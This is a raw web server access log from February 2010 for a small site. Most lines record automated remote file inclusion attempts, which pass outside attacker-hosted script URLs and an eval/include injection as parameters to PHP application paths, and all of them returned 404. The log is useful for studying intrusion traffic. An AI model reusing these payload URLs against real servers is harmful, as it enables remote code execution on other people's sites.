125.215.157.9 - - [08/Feb/2010:00:51:13 -0500] "GET /images/3abn.gif HTTP/1.1" 200 3774
125.215.157.9 - - [08/Feb/2010:00:51:14 -0500] "GET /images/vop.jpg HTTP/1.1" 200 2215
125.215.157.9 - - [08/Feb/2010:00:51:18 -0500] "GET /images/gd.gif HTTP/1.1" 200 4458
200.93.147.154 - - [08/Feb/2010:00:53:03 -0500] "GET /log/sdaglobal.org-access_log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 367
200.93.147.154 - - [08/Feb/2010:00:53:04 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 336
200.93.147.154 - - [08/Feb/2010:00:53:08 -0500] "GET /log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 340
38.99.97.195 - - [08/Feb/2010:00:53:25 -0500] "GET /robots.txt HTTP/1.1" 404 291
200.93.147.154 - - [08/Feb/2010:00:53:41 -0500] "GET /log/sdaglobal.org-error_log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 366
38.99.97.195 - - [08/Feb/2010:00:53:27 -0500] "GET /log/sdaglobal.org-access_log.4 HTTP/1.1" 200 3753619
38.99.97.195 - - [08/Feb/2010:00:54:03 -0500] "GET /mirror.htm HTTP/1.1" 200 3525
200.93.147.154 - - [08/Feb/2010:00:55:59 -0500] "GET //bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 311
200.93.147.154 - - [08/Feb/2010:00:56:01 -0500] "GET /log//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 315
69.174.48.203 - - [08/Feb/2010:00:59:28 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 293
69.174.48.203 - - [08/Feb/2010:00:59:28 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 289
69.174.48.203 - - [08/Feb/2010:00:59:28 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 319
69.174.48.203 - - [08/Feb/2010:00:59:42 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 318
213.219.188.166 - - [08/Feb/2010:01:01:47 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.abcpl.mobi/rss/unix1.txt?? HTTP/1.1" 404 310
213.219.188.166 - - [08/Feb/2010:01:01:47 -0500] "GET /log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.abcpl.mobi/rss/unix1.txt?? HTTP/1.1" 404 314
89.221.175.60 - - [08/Feb/2010:01:05:10 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 293
89.221.175.60 - - [08/Feb/2010:01:05:11 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 289
89.221.175.60 - - [08/Feb/2010:01:05:11 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 319
200.93.147.154 - - [08/Feb/2010:01:05:53 -0500] "GET /log/sdaglobal.org-error_log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 331
200.93.147.154 - - [08/Feb/2010:01:06:49 -0500] "GET ////modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/header?? HTTP/1.1" 404 315
200.93.147.154 - - [08/Feb/2010:01:06:49 -0500] "GET /log/sdaglobal.org-error_log%20%20////modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/header?? HTTP/1.1" 404 345
200.93.147.154 - - [08/Feb/2010:01:06:50 -0500] "GET /log////modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/header?? HTTP/1.1" 404 319
89.221.175.60 - - [08/Feb/2010:01:06:57 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 318
200.93.147.154 - - [08/Feb/2010:01:07:30 -0500] "GET /log/sdaglobal.org-access_log%20%20////modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/header?? HTTP/1.1" 404 346
69.174.48.203 - - [08/Feb/2010:01:09:40 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 319
69.174.48.203 - - [08/Feb/2010:01:09:40 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 289
69.174.48.203 - - [08/Feb/2010:01:09:40 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 293
89.221.175.60 - - [08/Feb/2010:01:10:54 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 319
89.221.175.60 - - [08/Feb/2010:01:10:55 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 289
89.221.175.60 - - [08/Feb/2010:01:10:57 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 293
200.226.134.29 - - [08/Feb/2010:01:11:34 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 289
200.226.134.29 - - [08/Feb/2010:01:11:34 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 319
200.226.134.29 - - [08/Feb/2010:01:11:34 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 293
69.174.48.203 - - [08/Feb/2010:01:12:22 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 318
200.226.134.29 - - [08/Feb/2010:01:12:28 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 318
89.221.175.60 - - [08/Feb/2010:01:14:30 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 318
65.55.207.126 - - [08/Feb/2010:01:15:07 -0500] "GET /robots.txt HTTP/1.1" 404 291
65.55.207.126 - - [08/Feb/2010:01:15:58 -0500] "GET /log/zjjs.sdaglobal.org-access_log.2 HTTP/1.1" 200 68960
77.221.130.15 - - [08/Feb/2010:01:20:43 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 320
77.221.130.15 - - [08/Feb/2010:01:20:43 -0500] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 324
77.221.130.15 - - [08/Feb/2010:01:20:45 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 353
99.23.128.80 - - [08/Feb/2010:01:20:56 -0500] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
77.221.130.15 - - [08/Feb/2010:01:21:22 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 320
77.221.130.15 - - [08/Feb/2010:01:21:22 -0500] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 324
77.221.130.15 - - [08/Feb/2010:01:21:22 -0500] "GET /log/sdaglobal.org-access_log.4//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 351
77.221.130.15 - - [08/Feb/2010:01:22:57 -0500] "GET /log/sdaglobal.org-error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 348
64.131.252.91 - - [08/Feb/2010:01:23:05 -0500] "GET /images/gd.gif HTTP/1.1" 200 4458
77.221.130.15 - - [08/Feb/2010:01:23:54 -0500] "GET /log/sdaglobal.org-error_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 350
65.55.207.74 - - [08/Feb/2010:01:24:09 -0500] "GET /log/sums56.hitechemall.com-access_log.3 HTTP/1.1" 200 95914
200.226.134.29 - - [08/Feb/2010:01:25:01 -0500] "GET /log/sdaglobal.org-error_log.1/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 319
200.226.134.29 - - [08/Feb/2010:01:25:02 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 289
200.226.134.29 - - [08/Feb/2010:01:25:02 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 293
77.221.130.15 - - [08/Feb/2010:01:28:31 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 320
77.221.130.15 - - [08/Feb/2010:01:28:31 -0500] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 324
77.221.130.15 - - [08/Feb/2010:01:28:31 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 353
200.226.134.29 - - [08/Feb/2010:01:30:36 -0500] "GET /log/sdaglobal.org-access_log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 318
77.221.130.15 - - [08/Feb/2010:01:31:29 -0500] "GET /log/sdaglobal.org-error_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 350
69.175.44.42 - - [08/Feb/2010:01:35:32 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 317
69.175.44.42 - - [08/Feb/2010:01:35:32 -0500] "GET /log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 321
200.93.147.154 - - [08/Feb/2010:01:38:53 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 291
200.93.147.154 - - [08/Feb/2010:01:38:53 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 324
200.93.147.154 - - [08/Feb/2010:01:38:53 -0500] "GET /log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 295
200.93.147.154 - - [08/Feb/2010:01:40:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 291
200.93.147.154 - - [08/Feb/2010:01:40:55 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 324
200.93.147.154 - - [08/Feb/2010:01:40:55 -0500] "GET /log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 295
200.93.147.154 - - [08/Feb/2010:01:43:31 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 324
200.93.147.154 - - [08/Feb/2010:01:44:47 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 324
200.93.147.154 - - [08/Feb/2010:01:44:59 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
200.93.147.154 - - [08/Feb/2010:01:45:05 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 321
200.93.147.154 - - [08/Feb/2010:01:45:05 -0500] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [08/Feb/2010:01:45:17 -0500] "GET /log/sdaglobal.org-error_log.2%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
77.88.28.246 - - [08/Feb/2010:01:47:02 -0500] "GET /robots.txt HTTP/1.1" 404 291
200.93.147.154 - - [08/Feb/2010:01:47:18 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 321
200.93.147.154 - - [08/Feb/2010:01:47:18 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
200.93.147.154 - - [08/Feb/2010:01:47:18 -0500] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [08/Feb/2010:01:47:37 -0500] "GET /log/sdaglobal.org-error_log.2%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
200.93.147.154 - - [08/Feb/2010:01:49:23 -0500] "GET /log/sdaglobal.org-access_log.1//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 322
200.93.147.154 - - [08/Feb/2010:01:50:26 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 292
200.93.147.154 - - [08/Feb/2010:01:50:26 -0500] "GET /log/sdaglobal.org-access_log.1%20%20/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [08/Feb/2010:01:50:29 -0500] "GET /log/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 296
200.93.147.154 - - [08/Feb/2010:01:50:34 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 324
200.93.147.154 - - [08/Feb/2010:01:51:31 -0500] "GET /modules/vwar/convert/mvcw_conver.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 394
200.93.147.154 - - [08/Feb/2010:01:51:31 -0500] "GET /log/modules/vwar/convert/mvcw_conver.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 398
200.93.147.154 - - [08/Feb/2010:01:51:31 -0500] "GET /log/sdaglobal.org-access_log.4%20%20/modules/vwar/convert/mvcw_conver.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 427
200.93.147.154 - - [08/Feb/2010:01:52:56 -0500] "GET /log/sdaglobal.org-access_log%20%20/modules/vwar/convert/mvcw_conver.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 425
200.93.147.154 - - [08/Feb/2010:01:53:27 -0500] "GET /log/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 296
200.93.147.154 - - [08/Feb/2010:01:53:27 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 292
200.93.147.154 - - [08/Feb/2010:01:53:28 -0500] "GET /log/sdaglobal.org-access_log.1%20%20/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [08/Feb/2010:01:53:48 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 324
75.101.214.102 - - [08/Feb/2010:01:57:22 -0500] "GET /robots.txt HTTP/1.1" 404 291
75.101.214.102 - - [08/Feb/2010:01:57:22 -0500] "GET / HTTP/1.1" 200 9426
77.221.130.15 - - [08/Feb/2010:02:02:18 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 329
77.221.130.15 - - [08/Feb/2010:02:02:18 -0500] "GET /log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 333
77.221.130.15 - - [08/Feb/2010:02:02:18 -0500] "GET /log/sdaglobal.org-error_log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 359
79.98.23.9 - - [08/Feb/2010:02:03:40 -0500] "GET /log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 333
79.98.23.9 - - [08/Feb/2010:02:03:40 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 329
79.98.23.9 - - [08/Feb/2010:02:03:40 -0500] "GET /log/sdaglobal.org-error_log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 359
65.55.207.132 - - [08/Feb/2010:02:04:34 -0500] "GET /mirror.htm HTTP/1.1" 304 -
65.55.207.99 - - [08/Feb/2010:02:06:12 -0500] "GET /log/china.sdaglobal.org-access_log.2 HTTP/1.1" 200 314948
219.79.226.196 - - [08/Feb/2010:02:10:32 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
219.79.226.196 - - [08/Feb/2010:02:10:32 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
79.98.23.9 - - [08/Feb/2010:02:13:40 -0500] "GET /log/sdaglobal.org-error_log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 357
77.221.130.15 - - [08/Feb/2010:02:13:44 -0500] "GET /log/sdaglobal.org-access_log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 358
77.221.130.15 - - [08/Feb/2010:02:13:50 -0500] "GET /log/sdaglobal.org-error_log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 357
79.98.23.9 - - [08/Feb/2010:02:14:44 -0500] "GET /log/sdaglobal.org-access_log.1/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 360
221.143.40.35 - - [08/Feb/2010:02:16:11 -0500] "GET /log//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 310
221.143.40.35 - - [08/Feb/2010:02:16:12 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 306
221.143.40.35 - - [08/Feb/2010:02:16:59 -0500] "GET /log/sdaglobal.org-access_log//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 335
220.80.108.81 - - [08/Feb/2010:02:18:25 -0500] "GET /log//components/com_flyspray/startdown.php?file=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 323
220.80.108.81 - - [08/Feb/2010:02:18:25 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 319
218.38.136.126 - - [08/Feb/2010:02:27:29 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 293
218.38.136.126 - - [08/Feb/2010:02:27:30 -0500] "GET /e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 289
218.38.136.126 - - [08/Feb/2010:02:27:30 -0500] "GET /log/sdaglobal.org-error_log.1%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 321
218.38.136.126 - - [08/Feb/2010:02:28:35 -0500] "GET /log/sdaglobal.org-error_log.2%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 321
218.38.136.126 - - [08/Feb/2010:02:29:06 -0500] "GET /e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 289
218.38.136.126 - - [08/Feb/2010:02:29:06 -0500] "GET /log/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 293
218.38.136.126 - - [08/Feb/2010:02:29:08 -0500] "GET /log/sdaglobal.org-error_log.1%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 321
218.38.136.126 - - [08/Feb/2010:02:29:21 -0500] "GET /log/sdaglobal.org-error_log.2%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 321
69.163.202.84 - - [08/Feb/2010:02:30:41 -0500] "GET /log/sdaglobal.org-access_log.3//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 353
69.163.202.84 - - [08/Feb/2010:02:30:42 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
69.163.202.84 - - [08/Feb/2010:02:30:42 -0500] "GET /log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 326
69.163.202.84 - - [08/Feb/2010:02:30:57 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
69.163.202.84 - - [08/Feb/2010:02:30:57 -0500] "GET /log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 326
69.163.202.84 - - [08/Feb/2010:02:30:57 -0500] "GET /log/sdaglobal.org-access_log.3//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 353
69.163.202.84 - - [08/Feb/2010:02:31:08 -0500] "GET /log/sdaglobal.org-access_log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 351
218.38.136.126 - - [08/Feb/2010:02:31:10 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
218.38.136.126 - - [08/Feb/2010:02:31:10 -0500] "GET /log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 326
218.38.136.126 - - [08/Feb/2010:02:31:10 -0500] "GET /log/sdaglobal.org-access_log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 351
81.176.226.164 - - [08/Feb/2010:02:31:12 -0500] "GET /log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 326
81.176.226.164 - - [08/Feb/2010:02:31:12 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
81.176.226.164 - - [08/Feb/2010:02:31:12 -0500] "GET /log/sdaglobal.org-access_log.3//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 353
81.176.226.164 - - [08/Feb/2010:02:31:12 -0500] "GET /log/sdaglobal.org-access_log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 351
220.80.108.81 - - [08/Feb/2010:02:33:43 -0500] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http: